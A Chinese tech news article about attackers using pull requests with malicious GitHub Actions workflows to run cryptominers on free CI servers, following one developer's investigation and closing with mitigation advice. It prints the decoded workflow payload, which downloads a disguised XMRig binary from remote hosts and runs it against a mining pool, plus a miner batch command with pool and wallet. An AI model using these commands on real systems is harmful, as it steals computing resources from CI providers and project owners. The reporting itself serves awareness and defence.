黑客用GitHub服务器挖矿,三天跑了3万个任务,代码惊现中文

这种骚操作黑客也真想得出来

梦晨 晓查 发自 凹非寺
量子位 报道 | 公众号 QbitAI

加密货币价格一路高涨,显卡又买不起,怎么才能“廉价”挖矿?

黑客们动起了歪心思——“白嫖”服务器。

给PC植入挖矿木马,已经无法满足黑客日益增长的算力需求,如果能用上GitHub的服务器,还不花钱,那当然是极好的。

黑客用GitHub服务器挖矿,三天跑了3万个任务,代码惊现中文

而且整个过程可能比侵入PC还容易,甚至都不需要程序员上当受骗。只需提交Pull Request(PR),即使项目管理者没有批准,恶意挖矿代码依然能够执行。

原理也很简单,利用GitHub Action的自动执行工作流功能,轻松将挖矿程序运行在GitHub的服务器上。

早在去年11月,就已经有人发现黑客这种行为。更可怕的是,半年过去了,这种现象依然没得到有效制止。

GitHub心里苦啊,虽然可以封禁违规账号,但黑客们玩起了“游击战术”,不断更换马甲号逃避“追捕”,让官方疲于奔命。

就在几天前,一位荷兰的程序员还发现,这种攻击方式依然存在,甚至代码里还出现了中文。

黑客用GitHub服务器挖矿,三天跑了3万个任务,代码惊现中文

那么,这些黑客是如何植入挖矿程序的呢?一切要从发现异常的法国程序员Tib说起。

PR异常让程序员起疑心

去年11月,Tib发现,自己在一个没有参加的repo上收到了PR请求。而且在14个小时内就收到了7个,全是来自一个“y4ndexhater1”的用户,没有任何描述内容。

黑客用GitHub服务器挖矿,三天跑了3万个任务,代码惊现中文

令人感到奇怪的是,这并不是一个热门项目,Star数量为0。

黑客用GitHub服务器挖矿,三天跑了3万个任务,代码惊现中文

打开项目主页发现,内容是Perl项目的github action、circle ci、travis-ci示例代码集合,整个README文档一团糟,根本不像一个正经的开源项目。

黑客用GitHub服务器挖矿,三天跑了3万个任务,代码惊现中文

然而就是这个混乱又冷门的repo,居然在3天里被fork了2次。

一切都太不正常了,让人嗅到了一丝不安的气息。

尝试“作死”运行

本着“作死”的精神,Tib决定一探究竟。

经过那位可疑用户的操作,Tib所有的action都被删除,在工作流里被加入了一个ci.yml文件,内容如下:

黑客用GitHub服务器挖矿,三天跑了3万个任务,代码惊现中文

当Tib看到eval “$(echo “YXB0IHVwZGF0ZSAt这一行内容后,立刻从沙发上跳了起来,他意识到事情的严重性:有人在入侵他的GitHub个人资料!

这串看似神秘的字符,其实是base64编码,经过翻译后,得到了另一段代码:

apt update -qq
apt install -y curl git jq
curl -Lfo prog https://github.com/bhriscarnatt/first-repo/releases/download/a/prog || curl -Lfo prog https://transfer.sh/OSPjK/prog
ip=$(curl -s -H ‘accept: application/dns-json’ ‘https://dns.google/resolve?name=poolio.magratmail.xyz&type=A’ | jq -r ‘.Answer[0].data’)
chmod u+x prog
timeout 4h ./prog -o “${ip}:3000” -u ChrisBarnatt -p ExplainingComputers –cpu-priority 5 > /dev/null

前面两行不必解释,有意思的地方从第三行开始,它会下载一个prog二进制文件。

为了安全起见,Tib先尝试获取信息而不是执行,得到了它的十六进制代码。

$ objdump -s –section .comment prog
prog: file format elf64-x86-64
Contents of section .comment:
0000 4743433a 2028416c 70696e65 2031302e GCC: (Alpine 10.
0010 322e315f 70726531 29203130 2e322e31 2.1_pre1) 10.2.1
0020 20323032 30313230 3300 20201203.

Tib也考虑过反编译,但是没有成功。

不入虎穴,焉得虎子,Tib决定尝试运行一下。

要执行这一大胆而又作死的任务,防止“试试就逝世”,Tib首先断开了电脑的网络链接,并选择在Docker容器中运行。

答案终于揭晓,原来这个prog是一个名为XMRig的挖矿程序。

$ ./prog –version
XMRig 6.8.1
built on Feb 3 2021 with GCC 10.2.1
features: 64-bit AES
libuv/1.40.0
OpenSSL/1.1.1i
hwloc/2.4.0

当时XMRig的最新版恰好是6.8.1,和上面的版本参数符合。不过用SHA256检测后发现,这个prog并不完全是XMRig,Tib预测它可能是一个修改版。

实际上,可能被攻击的不止GitHub,安全公司Aqua推测,像Docker Hub、Travis CI、Circle CI这些SaaS软件开发环境,都可能遭受这类攻击。

在这个攻击过程中,会派生一个合法的repo,负责将恶意的GitHub Action添加到原始代码。然后,黑客再向原始repo提交一个PR,将代码合并回原始repo。

下载的挖矿程序会伪装成prog或者gcc编译器,通过提交PR在项目执行自动化工作流。此时服务器将运行伪装后的挖矿程序。

黑客用GitHub服务器挖矿,三天跑了3万个任务,代码惊现中文

这些攻击者仅一次攻击就可以运行多达100个挖矿程序,从而给GitHub的服务器带来了巨大的计算量。

据Aqua估计,仅在三天的时间里,挖矿黑客就在GitHub上有超过2.33万次commit、在Docker Hub上5.8万次build,转化了大约3万个挖矿任务。

可以防范但很难根除

这种攻击甚至不需要被攻击的仓库管理者接受恶意Pull Request。

只要在.github/workflows目录里面的任意.yml文件中配置了在收到Pull Request时执行,来自黑客的Action就会自动被执行

如果你没有使用这个功能,那就不用担心啦,黑客大概也不会找上你。

需要用到这个功能的话,可以设置成只允许本地Action或只允许Github官方及特定作者创建的Action。

黑客用GitHub服务器挖矿,三天跑了3万个任务,代码惊现中文

将情况反馈给客服后,GitHub会对恶意账号进行封号和关闭相关Pull Request的操作。

但恶意攻击很难被根除,黑客只需要注册新的账号就可以继续白嫖服务器资源。

攻击还在继续

我们从最近一次攻击中发现,黑客将挖矿程序上传到GitLab并伪装成包管理工具npm。

黑客用GitHub服务器挖矿,三天跑了3万个任务,代码惊现中文

打开这个可疑的nani.bat,可以看到:

npm.exe –algorithm argon2id_chukwa2
–pool turtlecoin.herominers.com:10380
–wallet TRTLv3ZvhUDDzXp9RGSVKXcMvrPyV5yCpHxkDN2JRErv43xyNe5bHBaFHUogYVc58H1Td7vodta2fa43Au59Bp9qMNVrfaNwjWP
–password xo

这一次黑客挖的是乌龟币*(TurtleCoin)*,可使用CPU计算。按当前价格挖出四千多个币才值1美元。

黑客用GitHub服务器挖矿,三天跑了3万个任务,代码惊现中文

Github Actions的免费服务器可以提供英特尔E5 2673v4的两个核心,7GB内存。

大致估算单台运行一天只能获利几美分,而且黑客的挖矿程序通常只能在被发现之前运行几个小时。比如Docker Hub就把自动build的运行时间限制在2个小时。

不过蚊子再小也是肉,黑客通过寻找更多接受公开Action的仓库以及反复打开关闭Pull Request就能执行更多的挖矿程序。

黑客用GitHub服务器挖矿,三天跑了3万个任务,代码惊现中文

△同一黑客账号至少攻击了95个GitHub仓库

正如Twitter用户Dave Walker所说的,如果你提供免费的计算资源,就要做好会被攻击和滥用的觉悟。挖矿有利可图的情况下这是不可避免的。

黑客用GitHub服务器挖矿,三天跑了3万个任务,代码惊现中文

据报道,受害的不止GitHub,还有Docker Hub、Travis CI以及Circle CI等提供类似服务的持续集成平台。

这一乱象不知何时才能结束,唯一的好消息可能就是,挖矿的黑客似乎只是针对GitHub提供的服务器资源,而不会破坏你的代码。

但是GitHub Action的漏洞不止这一个。还有方法能使黑客读写开发者的仓库,甚至可以读取加密的机密文件。

黑客用GitHub服务器挖矿,三天跑了3万个任务,代码惊现中文

去年7月,Google Project Zero团队就已向GitHub通报漏洞。但在给出的90天修复期限+延长14天后,GitHub仍未能有效解决。

对此,我们的建议是,不要轻易相信GitHub市场里的Action作者,不要交出你的密匙。

参考链接:
[1]https://therecord.media/github-investigating-crypto-mining-campaign-abusing-its-server-infrastructure/
[2]https://dev.to/thibaultduponchelle/the-github-action-mining-attack-through-pull-request-2lmc
[3]https://blog.aquasec.com/container-security-alert-campaign-abusing-github-dockerhub-travis-ci-circle-ci
[4]https://twitter.com/JustinPerdok
[5]https://bugs.chromium.org/p/project-zero/issues/detail?id=2070

版权所有,未经授权不得以任何形式转载及使用,违者必究。